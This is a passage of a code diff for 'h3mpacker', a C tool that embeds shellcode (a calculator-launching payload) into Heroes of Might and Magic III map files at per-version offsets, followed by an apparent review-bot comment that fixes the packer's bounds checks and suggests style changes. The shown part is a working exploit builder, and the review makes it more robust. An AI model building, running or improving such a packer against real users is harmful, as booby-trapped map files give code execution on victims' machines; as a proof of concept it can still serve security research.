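+return 1;
+}
+free(buf);
+return 0;
+}
+static void _print_usage(void)
+{
+puts("Usage: h3mpacker <uncompressed h3m filename> <target #>");
+puts("Available targets:");
+puts(TARGET_DESCS);
+puts("Examples:");
+puts(" h3mpacker Arrogance.h3m 1");
+puts(" h3mpacker Deluge.h3m 2");
+}
+int main(int argc, char **argv)
+{
+FILE *h3m_f = NULL;
+int ret = 0;
+int target;
+if (argc != 3) {
+_print_usage();
+return 1;
+}
+h3m_f = fopen(argv[1], "rb+");
+target = strtoul(argv[2], NULL, 0);
+if (h3m_f == NULL || target < 1 || target > MAX_TARGET) {
+if (h3m_f != NULL)
+fclose(h3m_f);
+_print_usage();
+return 1;
+}
+ret = pack_h3m(h3m_f, TARGET_OFFSETS[target-1], CALC_PAYLOAD, sizeof(CALC_PAYLOAD));
+fclose(h3m_f);
+if (ret != 0)
+return ret;
+printf("[+] Payload embedded into h3m file %s\n", argv[1]);
+return 0;
+}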
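Review bot: pack_h3m overlays `struct exploit_oa_t` on `p` and then memcpy's `payload_size` bytes into `exp->shellcode2` without checking that the 144-byte struct plus payload still lies inside `buf`, so an input whose needle sits within that distance of end-of-file (or at an offset below 4, where `p -= 4` steps before the start of `buf`) makes the packer corrupt its own heap before `fwrite` runs. The `ftell` result is also used unchecked, so a failure (-1) reaches `malloc(h3m_size)` as a huge size; rejecting a negative size and bounding the overlay closes both holes. Separately, `_memmem` and `_print_usage` begin with an underscore at file scope, which C11 reserves for the implementation, and `TARGET_OFFSETS` punning string literals into `struct offsets_t` would read more cleanly as designated initializers of the three `uint32_t` fields.
```c
// … unchanged: fseek to end …
h3m_size = ftell(h3m_f);
if (h3m_size < 0 || payload_size < 0) {
    puts("[!] Failed to determine file size");
    return 1;
}
// … unchanged: rewind, malloc, fread, _memmem for NEEDLE …
// The struct overlay plus payload must fit inside buf, and the 4-byte
// size field must exist in front of the needle
if (p - buf < 4 ||
    (size_t)(p - buf) - 4 + sizeof(*exp) + (size_t)payload_size > (size_t)h3m_size) {
    puts("[!] Not enough room around needle for the exploit struct and payload");
    free(buf);
    return 1;
}
// Move back 4 bytes from sprite name, pointing to the size of the sprite name
p -= 4;
// … unchanged: overlay struct, copy payload, rewind, fwrite, cleanup …
```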